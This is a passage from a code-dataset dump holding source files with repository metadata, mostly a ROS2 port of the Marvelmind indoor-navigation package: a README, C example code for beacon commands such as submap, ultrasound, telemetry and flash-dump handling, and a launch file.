so that everything isn't \"markdown code\" when it isn't intended to be.\n group_iter = [(md_to_html(p1),md_to_html(remove_indention(p2))) for p1,p2 in group_iter]\n\n with open(file_name + '.csv', 'w+') as csvfile:\n # print('csvfile', csvfile)\n writer = csv.writer(csvfile, delimiter=FILE_DELIM)\n for pair in group_iter:\n # is there a more efficient way of doing this? \n writer.writerow([pair[0], pair[1]])\n print(\"file_name: \", file_name)\n print('num cards:', len(group_iter))\n\ndef update_cards():\n '''\n TODO: Finish\n Pulls cards from online.\n '''\n with open(\"all_cards.pickle\") as all_cards_pickle:\n old_cards = pickle.load(all_cards_pickle)\n\n\nif __name__=='__main__':\n # post_cards()\n # print(\"Hello World\")\n # a = [100,100]\n\n\n add_cards()\n\n"
},
{
"alpha_fraction": 0.5675675868988037,
"alphanum_fraction": 0.5675675868988037,
"avg_line_length": 18.66666603088379,
"blob_id": "eccf4a995fb593709c33501dc23c87a9b988c00a",
"content_id": "f4250a2b59e3019c2ea52a447752ea432294b473",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/install_mgr.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "\nclass Category:\n '''\n Category Holder\n '''\n def __init__():\n pass\n\nif __name__=='__main__':\n \n #If there's a pickle file for the categorires, fill that in\n #If theere's not, generate one\n #Is there an API to identify the model of a specific laptop?\n \n\n pass\n"
}
] | 7 |
aminballoon/ros_marvelmind_package
|
https://github.com/aminballoon/ros_marvelmind_package
|
e00be66636d59eaef32f1691d1b5560781ffa93a
|
ca42a11d8c4205f0b15027eb32495b8abeddab52
|
53d1844bccada64ed3578d9afdd9c8b601fb9a7f
|
refs/heads/master
| 2023-08-18T21:51:40.580091 | 2021-10-13T09:06:44 | 2021-10-13T09:06:44 | 416,161,213 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7676767706871033,
"alphanum_fraction": 0.7838383913040161,
"avg_line_length": 54,
"blob_id": "3160ff244c5263dec303411d36752e742eb92910",
"content_id": "669bc79af1f4e0ea32a3a0c81103be6c169def37",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 495,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 9,
"path": "/marvelmind_nav/README.md",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Marvelmind ROS2 Package\n\nThis package is an attempt to port the [ros_marvelmind_package](https://bitbucket.org/marvelmind_robotics/ros_marvelmind_package/src/master/)\nfrom ROS to ROS2. All rights as mentioned by the License belong to Marvelmind.\n\n\n## TODOS\n1. Upgrade launch file to use LaunchCOnfiguration/LaunchArguments\n2. Upgrade port and baud to params and load on `on_configure()` to make it more robust. Can be done once [this issue](https://github.com/ros2/rclcpp/issues/855) is fixed\n"
},
{
"alpha_fraction": 0.5292283296585083,
"alphanum_fraction": 0.5497533082962036,
"avg_line_length": 25.90389633178711,
"blob_id": "9e668b089e7455bb3fb8ec1e892b9a61efc2c3b4",
"content_id": "aff028609cff1a1c0f2cab546511f893768316b4",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 21486,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 770,
"path": "/marvelmind_nav/src/marvelmind_example.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#endif // WIN32\r\n#include \"marvelmind_nav/marvelmind_example.h\"\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n#include \"marvelmind_nav/marvelmind_utils.h\"\r\n#include \"marvelmind_nav/marvelmind_pos.h\"\r\n\r\ntypedef enum {\r\n waitPort, waitDevice, connected\r\n} ConState;\r\nConState conState= waitPort;\r\n\r\nMMDeviceType deviceTypeUSB= unknown;\r\n\r\nMarvelmindDeviceVersion usbDevVersion;\r\n\r\n/////////////////////////////////////////////////////////////////////\r\n\r\nstatic void switchToConState(ConState newConState);\r\n\r\n// Reopen port\r\nstatic void marvelmindReopenPort() {\r\n mmClosePort();\r\n switchToConState(waitPort);\r\n}\r\n\r\n// Reads Marvelmind API version\r\nbool marvelmindCheckVersionCommand(char *token1) {\r\n if (strcmp(token1,\"version\") != 0)\r\n return false;\r\n\r\n uint32_t version= 0;\r\n if (mmAPIVersion(&version)) {\r\n printf(\"Marvelmind API version: %d\\r\\n\", (int) version);\r\n } else {\r\n printf(\"Marvelmind API version read failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute wake command\r\nbool marvelmindCheckWakeCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"wake\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n\r\n\r\n if (address == 0){\r\n mmWakeDevice(address);\r\n printf(\"Wake command was sent\\r\\n\");\r\n return false;\r\n }\r\n else if (mmWakeDevice(address)) {\r\n printf(\"Wake command was sent\\r\\n\");\r\n return false;\r\n\r\n } else {\r\n printf(\"Wake command failed\\r\\n\");\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute sleep command\r\nbool marvelmindCheckSleepCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"sleep\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n uint8_t address= atoi(token2);\r\n if (address == 0){\r\n mmSendToSleepDevice(address);\r\n printf(\"Sleep command was sent\\r\\n\");\r\n return false;\r\n }\r\n else if (mmSendToSleepDevice(address)) {\r\n printf(\"Sleep command was sent\\r\\n\");\r\n } else {\r\n printf(\"Sleep command failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute 'default' command - set default setings\r\nbool marvelmindCheckDefaultCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"default\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n if (mmSetDefaultSettings(address)) {\r\n printf(\"Default settings command was sent\\r\\n\");\r\n } else {\r\n printf(\"Default setings command failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and executer read beacon telemetry command\r\nbool marvelmindCheckTelemetryCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"tele\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n\r\n MarvelmindBeaconTelemetry tele;\r\n\r\n if (mmGetBeaconTelemetry(address, &tele)) {\r\n printf(\"Beacon %d telemetry:\\r\\n\", (int) address);\r\n printf(\" Working time: %d sec\\r\\n\", (int) tele.worktimeSec);\r\n printf(\" RSSI: %d dBm\\r\\n\", (int) tele.rssi);\r\n printf(\" Voltage: %.3f V\\r\\n\", (float) tele.voltageMv/1000.0);\r\n printf(\" Temperature: %d C\\r\\n\", (int) tele.temperature);\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Read and show submap settings\r\nbool marvelmindShowSubmapSettings(uint8_t submapId) {\r\n MarvelmindSubmapSettings sm;\r\n if (!mmGetSubmapSettings(submapId, &sm)) {\r\n return false;\r\n }\r\n\r\n uint8_t i;\r\n\r\n printf(\"Submap %d settings:\\r\\n\", (int) submapId);\r\n\r\n if (sm.frozen) {\r\n printf(\" Submap is FROZEN\\r\\n\");\r\n } else {\r\n printf(\" Submap is not frozen\\r\\n\");\r\n }\r\n if (sm.locked) {\r\n printf(\" Submap is locked\\r\\n\");\r\n } else {\r\n printf(\" Submap is not locked\\r\\n\");\r\n }\r\n if (sm.beaconsHigher) {\r\n printf(\" Stationary beacons higher than mobile\\r\\n\");\r\n } else {\r\n printf(\" Stationary beacons lower than mobile\\r\\n\");\r\n }\r\n if (sm.mirrored) {\r\n printf(\" Submap is mirrored\\r\\n\");\r\n } else {\r\n printf(\" Submap is not mirrored\\r\\n\");\r\n }\r\n\r\n printf(\" Starting beacon trilateration: %d\\r\\n\", (int) sm.startingBeacon);\r\n printf(\" Starting set: %d; %d;%d;%d\\r\\n\",\r\n (int) sm.startingSet_1, (int) sm.startingSet_2, (int) sm.startingSet_3,(int) sm.startingSet_4);\r\n printBoolEnabled(\" 3D navigation\", sm.enabled3d);\r\n printBoolEnabled(\" Only for Z coordinate\", sm.onlyForZ);\r\n if (sm.limitationDistanceIsManual) {\r\n printf(\" Limitation distances: manual\\r\\n\");\r\n printf(\" Maximum distance, m: %d\\r\\n\", sm.maximumDistanceManual_m);\r\n } else {\r\n printf(\" Limitation distances: auto\\r\\n\");\r\n }\r\n\r\n printf(\" Submap X shift, m: %.2f\\r\\n\", (float) sm.submapShiftX_cm/100.0);\r\n printf(\" Submap Y shift, m: %.2f\\r\\n\", (float) sm.submapShiftY_cm/100.0);\r\n printf(\" Submap Z shift, m: %.2f\\r\\n\", (float) sm.submapShiftZ_cm/100.0);\r\n printf(\" Submap rotation, degrees: %.2f\\r\\n\", (float) sm.submapRotation_cdeg/100.0);\r\n\r\n printf(\" Plane rotation quaternion: W=%d, X=%d, Y=%d, Z=%d\\r\\n\",\r\n (int) sm.planeQw, (int) sm.planeQx, (int) sm.planeQy, (int) sm.planeQz);\r\n\r\n printf(\" Service zone thickness, m: %.2f\\r\\n\", (float) sm.serviceZoneThickness_cm/100.0);\r\n printf(\" Hedges height in 2D mode, m: %.2f\\r\\n\", (float) sm.hedgesHeightFor2D_cm/100.0);\r\n\r\n printf(\" Beacons in submap: \");\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n if (sm.beacons[i]!=0) {\r\n printf(\"%d \", (int) sm.beacons[i]);\r\n }\r\n }\r\n printf(\"\\r\\n\");\r\n\r\n printf(\" Nearby submaps: \");\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n if (sm.nearbySubmaps[i]!=255) {\r\n printf(\"%d \", (int) sm.nearbySubmaps[i]);\r\n }\r\n }\r\n printf(\"\\r\\n\");\r\n\r\n printf(\" Service zone: \");\r\n if (sm.serviceZonePointsNum == 0) {\r\n printf(\"none \\r\\n\");\r\n } else {\r\n for(i=0;i<sm.serviceZonePointsNum;i++) {\r\n ServiceZonePoint p= sm.serviceZonePolygon[i];\r\n printf(\"X= %.2f, Y= %.2f \", (float) p.x/100.0, (float) p.y/100.0);\r\n }\r\n printf(\"\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Test function for writing submap settings\r\nbool marvelmindTestSetSubmapSettings(uint8_t submapId) {\r\n MarvelmindSubmapSettings sm;\r\n\r\n uint8_t i;\r\n\r\n sm.frozen= true;\r\n sm.locked= true;\r\n sm.beaconsHigher= false;\r\n sm.mirrored= false;\r\n\r\n sm.startingBeacon= 9;\r\n\r\n sm.enabled3d= true;\r\n sm.onlyForZ= true;\r\n sm.limitationDistanceIsManual= true;\r\n sm.maximumDistanceManual_m= 19;\r\n\r\n sm.submapShiftX_cm= 987;\r\n sm.submapShiftY_cm= -654;\r\n sm.submapShiftZ_cm= 321;\r\n\r\n sm.submapRotation_cdeg= 10423;\r\n\r\n sm.planeQw= 10000;\r\n sm.planeQx= 0;\r\n sm.planeQy= 0;\r\n sm.planeQz= 0;\r\n\r\n sm.serviceZoneThickness_cm= -500;\r\n\r\n sm.hedgesHeightFor2D_cm= 350;\r\n\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n sm.beacons[i]= 0;\r\n }\r\n sm.beacons[0]= 9;\r\n sm.beacons[1]= 10;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n sm.nearbySubmaps[i]= 255;\r\n }\r\n sm.nearbySubmaps[0]= 2;\r\n\r\n sm.serviceZonePointsNum= 4;\r\n sm.serviceZonePolygon[0].x= 100;\r\n sm.serviceZonePolygon[0].y= 150;\r\n sm.serviceZonePolygon[1].x= -220;\r\n sm.serviceZonePolygon[1].y= 130;\r\n sm.serviceZonePolygon[2].x= -250;\r\n sm.serviceZonePolygon[2].y= -80;\r\n sm.serviceZonePolygon[3].x= 154;\r\n sm.serviceZonePolygon[3].y= -120;\r\n\r\n if (!mmSetSubmapSettings(submapId, &sm)) {\r\n printf(\"Submap %d settings sending error\\r\\n\", (int) submapId);\r\n return false;\r\n }\r\n\r\n printf(\"Submap %d settings sending success\\r\\n\", (int) submapId);\r\n\r\n return true;\r\n}\r\n\r\n// Check and executer submap command (add submap, delete submap etc)\r\nbool marvelmindCheckSubmapCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"submap\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint8_t submapId= atoi(token3);\r\n\r\n if (strcmp(token2,\"add\") == 0) {\r\n if (mmAddSubmap(submapId)) {\r\n printf(\"Submap %d added\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d add failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"delete\") == 0) {\r\n if (mmDeleteSubmap(submapId)) {\r\n printf(\"Submap %d deleted\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d delete failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"freeze\") == 0) {\r\n if (mmFreezeSubmap(submapId)) {\r\n printf(\"Submap %d freeze success\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d freeze failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"unfreeze\") == 0) {\r\n if (mmUnfreezeSubmap(submapId)) {\r\n printf(\"Submap %d unfreeze success\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d unfreeze failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"get\") == 0) {\r\n marvelmindShowSubmapSettings((int) submapId);\r\n }\r\n else if (strcmp(token2,\"testset\") == 0) {\r\n marvelmindTestSetSubmapSettings((int) submapId);\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute map command\r\nbool marvelmindCheckMapCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"map\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"erase\") == 0) {\r\n if (mmEraseMap()) {\r\n printf(\"Erase map success\\r\\n\");\r\n } else {\r\n printf(\"Erase map failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Command to get/set update rate setting\r\nbool marvelmindCheckRateCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"rate\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n float updRate;\r\n if (mmGetUpdateRateSetting(&updRate)) {\r\n printf(\"Update rate setting: %.2f Hz\\r\\n\", updRate);\r\n } else {\r\n printf(\"Update rate setting read failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n if (strcmp(token2,\"set\") == 0) {\r\n if (token3 == NULL)\r\n return true;\r\n\r\n float updRate= atof(token3);\r\n if (mmSetUpdateRateSetting(&updRate)) {\r\n printf(\"Update rate setting write success\\r\\n\");\r\n } else {\r\n printf(\"Update rate setting write failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nstatic char *marvelmindDSPFilterString(uint8_t filterIndex) {\r\n switch(filterIndex) {\r\n case MM_US_FILTER_19KHZ: return \"19 kHz\";\r\n case MM_US_FILTER_25KHZ: return \"25 kHz\";\r\n case MM_US_FILTER_31KHZ: return \"31 kHz\";\r\n case MM_US_FILTER_37KHZ: return \"37 kHz\";\r\n case MM_US_FILTER_45KHZ: return \"45 kHz\";\r\n case MM_US_FILTER_56KHZ: return \"56 kHz\";\r\n default: return \"unknown\";\r\n }\r\n}\r\n\r\n// Command to get/set ultrasound settings\r\nbool marvelmindCheckUltrasoundCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"usound\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token3);\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n MarvelmindUltrasoundSettings us;\r\n if (mmGetUltrasoundSettings(address, &us)) {\r\n printf(\"Ultrasound settings for beacon %d:\\r\\n\", address);\r\n printf(\" Tx frequency, Hz: %d\\r\\n\", (int) us.txFrequency_hz);\r\n printf(\" Tx number of periods: %d\\r\\n\", (int) us.txPeriodsNumber);\r\n if (us.rxAmplifierAGC) {\r\n printf(\" Amplification: AGC\\r\\n\");\r\n } else {\r\n printf(\" Amplification: manual\\r\\n\");\r\n }\r\n if (!us.rxAmplifierAGC) {\r\n printf(\" Amplification: %d\\r\\n\", (int) us.rxAmplificationManual);\r\n }\r\n printf(\" Sensors normal: %d %d %d %d %d\\r\\n\",\r\n boolAsInt(us.sensorsNormal[0]),\r\n boolAsInt(us.sensorsNormal[1]),\r\n boolAsInt(us.sensorsNormal[2]),\r\n boolAsInt(us.sensorsNormal[3]),\r\n boolAsInt(us.sensorsNormal[4])\r\n );\r\n printf(\" Sensors frozen: %d %d %d %d %d\\r\\n\",\r\n boolAsInt(us.sensorsFrozen[0]),\r\n boolAsInt(us.sensorsFrozen[1]),\r\n boolAsInt(us.sensorsFrozen[2]),\r\n boolAsInt(us.sensorsFrozen[3]),\r\n boolAsInt(us.sensorsFrozen[4])\r\n );\r\n\r\n printf(\" Rx DSP filter: %s\\r\\n\", marvelmindDSPFilterString(us.rxDSPFilterIndex));\r\n } else {\r\n printf(\"Ultrasound settings read failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n if (strcmp(token2,\"testset\") == 0) {\r\n MarvelmindUltrasoundSettings us;\r\n printf(\"Test writing ultrasound settings to beacon %d\\r\\n\", (int) address);\r\n\r\n us.txFrequency_hz= 31234;\r\n us.txPeriodsNumber= 34;\r\n us.rxAmplifierAGC= false;\r\n us.rxAmplificationManual= 2345;\r\n\r\n us.sensorsNormal[MM_SENSOR_RX1]= true;\r\n us.sensorsNormal[MM_SENSOR_RX2]= false;\r\n us.sensorsNormal[MM_SENSOR_RX3]= false;\r\n us.sensorsNormal[MM_SENSOR_RX4]= true;\r\n us.sensorsNormal[MM_SENSOR_RX5]= false;\r\n\r\n us.sensorsFrozen[MM_SENSOR_RX1]= true;\r\n us.sensorsFrozen[MM_SENSOR_RX2]= false;\r\n us.sensorsFrozen[MM_SENSOR_RX3]= false;\r\n us.sensorsFrozen[MM_SENSOR_RX4]= true;\r\n us.sensorsFrozen[MM_SENSOR_RX5]= true;\r\n\r\n us.rxDSPFilterIndex= MM_US_FILTER_45KHZ;\r\n\r\n if (mmSetUltrasoundSettings(address, &us)) {\r\n printf(\"Ultrasound settings write success\\r\\n\");\r\n } else {\r\n printf(\"Ultrasound settings write failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckAxesCommand(char *token1, char *token2, char *token3, char *token4) {\r\n if (strcmp(token1,\"axes\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n if (token4 == NULL)\r\n return true;\r\n\r\n uint8_t address_0= atoi(token2);\r\n uint8_t address_x= atoi(token3);\r\n uint8_t address_y= atoi(token4);\r\n\r\n if (mmBeaconsToAxes(address_0, address_x, address_y)) {\r\n printf(\"Beacons to axes success\\r\\n\");\r\n } else {\r\n printf(\"Beacons to axes failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\nstatic uint8_t dump_buffer[65536];\r\nbool marvelmindCheckReadDumpCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"read_dump\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n\r\n uint32_t offset= atoi(token2);\r\n uint32_t size= atoi(token3);\r\n if (size == 0)\r\n return true;\r\n if (size>65536UL)\r\n size= 65536UL;\r\n\r\n uint32_t i;\r\n\r\n //uint8_t *dump_buffer= malloc(size);\r\n\r\n if (mmReadFlashDump(offset, size, &dump_buffer[0])) {\r\n printf(\"Read flash dump success\\r\\n\");\r\n for(i=0;i<size;i++) {\r\n printf(\" %02x\", dump_buffer[i]);\r\n }\r\n printf(\"\\r\\n\");\r\n } else {\r\n printf(\"Read flash dump failed\\r\\n\");\r\n }\r\n\r\n //free(dump_buffer);\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckWriteDumpCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"write_dump_test\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint32_t offset= atoi(token2);\r\n uint32_t size= atoi(token3);\r\n if (size == 0)\r\n return true;\r\n if (size>65536UL)\r\n size= 65536UL;\r\n\r\n uint32_t i;\r\n\r\n //uint8_t *dump_buffer= malloc(size);\r\n for(i=0;i<size;i++) {\r\n dump_buffer[i]= i+1;\r\n }\r\n\r\n if (mmWriteFlashDump(offset, size, &dump_buffer[0])) {\r\n printf(\"Write flash dump success\\r\\n\");\r\n } else {\r\n printf(\"Write flash dump failed\\r\\n\");\r\n }\r\n\r\n //free(dump_buffer);\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckResetCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"reset\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint32_t address= atoi(token2);\r\n\r\n if (mmResetDevice(address)) {\r\n printf(\"Reset device success\\r\\n\");\r\n } else {\r\n printf(\"Reset device failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckTemperatureCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"temperature\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n int8_t temperature;\r\n if (mmGetAirTemperature(&temperature)) {\r\n printf(\"Temperature %d celsius \\r\\n\", (int) temperature);\r\n } else {\r\n printf(\"Temperature read failed\\r\\n\");\r\n }\r\n } else if (strcmp(token2,\"set\") == 0) {\r\n if (token3 == NULL)\r\n return true;\r\n\r\n int8_t temperature= atoi(token3);\r\n if (mmSetAirTemperature(temperature)) {\r\n printf(\"Temperature write success \\r\\n\");\r\n } else {\r\n printf(\"Temperature write failed\\r\\n\");\r\n }\r\n }\r\n\r\n return true;\r\n}\r\n\r\n\r\n// Change connection state\r\nstatic void switchToConState(ConState newConState) {\r\n switch(newConState) {\r\n case waitPort: {\r\n printf(\"Waiting for port...\\r\\n\");\r\n break;\r\n }\r\n case waitDevice: {\r\n printf(\"Trying connect to device...\\r\\n\");\r\n break;\r\n }\r\n case connected: {\r\n printf(\"Device is connected via USB.\\r\\n\");\r\n printMMDeviceVersionAndId(&usbDevVersion);\r\n\r\n deviceTypeUSB= getMMDeviceType(usbDevVersion.fwVerDeviceType);\r\n printMMDeviceType(&deviceTypeUSB);\r\n break;\r\n }\r\n }\r\n conState= newConState;\r\n}\r\n\r\nbool marvelmindCheckSetLocCommand(char *token1, char *token2, char *token3, char *token4, char *token5) {\r\n if (strcmp(token1,\"setloc\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n if (token4 == NULL)\r\n return true;\r\n\r\n if (token5 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n float pos_x_m= atof(token3);\r\n float pos_y_m= atof(token4);\r\n float pos_z_m= atof(token5);\r\n\r\n if (mmSetBeaconLocation(address, pos_x_m*1000.0f, pos_y_m*1000.0f, pos_z_m*1000.0f)) {\r\n printf(\"Location setup success\\r\\n\");\r\n } else {\r\n printf(\"Location setup failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Working cycle if modem is connected via USB\r\nvoid marvelmindModemCycle() {\r\n static uint8_t failCounter= 0;\r\n\r\n marvelmindDevicesReadIfNeeded();\r\n\r\n switch(marvelmindLocationsReadIfNeeded()) {\r\n case readSuccess: {\r\n failCounter= 0;\r\n break;\r\n }\r\n case readFail: {\r\n failCounter++;\r\n if (failCounter>10) {\r\n marvelmindReopenPort();\r\n break;\r\n }\r\n break;\r\n }\r\n case notRead: {\r\n break;\r\n }\r\n }\r\n}\r\n\r\n// Working cycle if beacon is connected via USB\r\nvoid marvelmindBeaconCycle() {\r\n //TODO\r\n}\r\n\r\n// Marvelmind communication state machine\r\nbool marvelmindCycle() {\r\n // printf(\"%u\\n\",conState);\r\n switch(conState) {\r\n case waitPort: {\r\n // if (mmOpenPortByName(\"/dev/Modem\")) {\r\n if (mmOpenPort()) {\r\n switchToConState(waitDevice);\r\n return false;\r\n }\r\n sleep_ms(1);\r\n return false;\r\n }\r\n case waitDevice: {\r\n if (mmGetVersionAndId(MM_USB_DEVICE_ADDRESS, &usbDevVersion)) {\r\n switchToConState(connected);\r\n }\r\n sleep_ms(1);\r\n return false;\r\n }\r\n case connected: {\r\n switch(deviceTypeUSB) {\r\n case modem: {\r\n marvelmindModemCycle();\r\n return true;\r\n }\r\n case beacon:\r\n case hedgehog: {\r\n marvelmindBeaconCycle();\r\n return true;\r\n }\r\n\r\n case unknown: {\r\n return true;\r\n }\r\n }\r\n return true;\r\n }\r\n } \r\n return 0;\r\n}\r\n\r\nvoid marvelmindStart() {\r\n marvelmindAPILoad();// Load Marvelmind API library\r\n initMarvelmindDevicesList();\r\n initMarvelmindPos();\r\n switchToConState(waitPort);// Start waiting port connection\r\n}\r\n\r\nvoid marvelmindFinish() {\r\n mmClosePort();// Close port (if was opened)\r\n\r\n marvelmindAPIFree();// Free Marvelmind API library memory\r\n}\r\n"
},
{
"alpha_fraction": 0.6995074152946472,
"alphanum_fraction": 0.7044335007667542,
"avg_line_length": 30.30769157409668,
"blob_id": "50471e479470d8db67fbfc77bfacff0e6b564010",
"content_id": "713212e94fcb5070eba40619572546d9533d74ef",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 13,
"path": "/marvelmind_nav/launch/marvel_base_launch.py",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "from launch import LaunchDescription\nfrom launch_ros.actions import LifecycleNode\n# from launch_ros.actions import Node\nimport sys\n\ndef generate_launch_description():\n return LaunchDescription([\n LifecycleNode(package='marvelmind_nav', node_executable='marvelmind_nav',\n node_name='lc_marvel2', output='screen'),\n ])\n\ndef main(argv=sys.argv[1:]):\n print(\"Running main\")"
},
{
"alpha_fraction": 0.5185671448707581,
"alphanum_fraction": 0.5410727858543396,
"avg_line_length": 30.512195587158203,
"blob_id": "f529d7c9744850e0ac249d001d0939115d7d1ffa",
"content_id": "623f1e7fb591777292cda66980af4af5953ee091",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5332,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 164,
"path": "/marvelmind_nav/src/marvelmind_pos.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include \"marvelmind_nav/marvelmind_pos.h\"\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n\r\n#ifdef WIN32\r\nstatic clock_t prevReadTime;\r\n#else\r\nstatic struct timespec prevReadTime;\r\n#endif\r\n\r\n////////////////////////////////////////////////////////////////////////\r\n\r\n// Read raw distances between Marvelmind devices\r\nvoid marvelmindReadRawDistances() {\r\n MarvelmindDistances distPack;\r\n\r\n if (mmGetLastDistances(&distPack)) {\r\n uint8_t n= distPack.numDistances;\r\n uint8_t i;\r\n for(i=0; i<n; i++) {\r\n uint8_t addressRx= distPack.distance[i].addressRx;\r\n uint8_t addressTx= distPack.distance[i].addressTx;\r\n if ( (addressRx == 0) || (addressTx == 0))\r\n continue;\r\n\r\n uint32_t dist= distPack.distance[i].distance_mm;\r\n\r\n MarvelmindDevice *mmDeviceRx= marvelmindUpdateDistance(addressRx, addressTx, dist);\r\n if (mmDeviceRx != NULL) {\r\n printf(\"Raw distance: %d ==> %d : %.3f \\r\\n\", (int) addressTx, (int) addressRx, (float) dist/1000.0);\r\n }\r\n }//for i\r\n }\r\n}\r\n\r\n#if MM_LOCATIONS_VERSION==1\r\n// Obsolete version of function for API V1, V2 - read locations without angle\r\n// Read new locations of Marvelmind devices\r\nMMPosReadStatus marvelmindLocationsReadIfNeeded() {\r\n #ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n\r\n if (passedSec<(1.0/MARVELMIND_POS_READ_RATE)) {\r\n return notRead;\r\n }\r\n prevReadTime= curTime;\r\n\r\n MarvelmindLocationsPack posPack;\r\n if 